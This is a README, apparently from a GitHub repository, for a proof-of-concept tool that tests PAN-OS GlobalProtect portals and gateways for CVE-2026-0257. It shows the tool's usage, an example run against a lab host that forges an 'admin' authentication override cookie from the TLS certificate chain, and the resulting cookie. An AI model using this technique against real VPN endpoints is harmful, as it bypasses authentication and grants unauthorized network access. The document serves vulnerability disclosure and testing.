sfewer-r7/CVE-2026-0257

# Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257) A proof-of-concept script to test a target PAN-OS GlobalProtect portal or gateway for [CVE-2026-0257](https://security.paloaltonetworks.com/CVE-2026-0257). The script will attempt to forge a valid authentication override cookie by iterating over the certificate chain used by the HTTPS service, and for every public key in the chain, forge a new authentication override cookie, testing it against the GlobaProtect target to see if it is valid. A successfully forged cookie will login to the GlobaProtect target and retrieve VPN connection information (Use the `--verbose` argument to inspect). ## Usage $ python forge_cookie.py --help usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID] [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose] Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257). options: -h, --help show this help message and exit --target TARGET Target GlobalProtect portal or gateway (IP or hostname) --port PORT Target port (default: 443) --user USER Username to forge cookie for (default: admin) --domain DOMAIN Domain for cookie (default: empty) --host-id HOST_ID Host ID for cookie (default: empty) --client-os CLIENT_OS Client OS for cookie (default: Windows) --client-ip CLIENT_IP Client IP in cookie (default: 0.0.0.0) --context {gateway,portal,both} Context to test: gateway, portal, or both (default target) --verbose Print full response ## Example $ python forge_cookie.py --target 192.168.86.99 [*] Retrieving certificate chain from 192.168.86.99:443 ... Found 2 certificate(s) in chain: [0] CN=192.168.86.99 (RSA 2048 bits, CA=False) [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True) [*] Forging cookie for user 'admin', testing each key Trying [0] CN=192.168.86.99 [-] Failure - Gateway did not accepted the forged cookie [-] Failure - Portal did not accepted the forged cookie Trying [1] CN=GP-Lab-CA [+] Success - Gateway accepted the forged cookie Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==